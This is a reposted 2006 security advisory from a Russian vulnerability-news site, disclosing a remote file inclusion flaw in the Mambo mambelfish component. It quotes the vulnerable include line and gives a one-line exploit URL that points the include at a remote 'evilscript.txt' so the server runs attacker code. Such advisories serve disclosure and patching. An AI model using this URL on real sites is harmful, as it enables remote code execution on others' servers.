Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SA21543] mail f/w system Mail Header Injection Vulnerability

  [SA21604] Drupal E-commerce Module Script Insertion Vulnerabilities

  [SA21603] Drupal Easylinks Module Script Insertion and SQL Injection

  [SA21584] Empire CMS "check_path"
File Inclusion Vulnerability

From:bilkopat_(at)_hotmail.com <bilkopat_(at)_hotmail.com>
Date:21 августа 2006 г.
Subject:Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability


####################################################
#                                                  #
#         C Y BE R - W A R R i O R   T I M         #
#                                                  #
####################################################

mambo com_mambelfish Component (mosConfig_absolute_path) Remote File
Inclusion Vulnerabilities

####################################################

Author: mdx

####################################################

Class : Remote

####################################################

[email protected]: bilkopat[at]hotmail[dot]com

####################################################

Code: mambelfish.class.php?, line 28
*********************************************************************************
******************

 require_once( "$mosConfig_absolute_path/administrator/classes/minixml/minixml.inc.
php" );

*********************************************************************************
******************


Exploit:
http://www.site.com/[path]/administrator/components/com_mambelfish/mambelfish.
class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

####################################################
Greetz: Cyber-warrior TIM USERS
####################################################

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород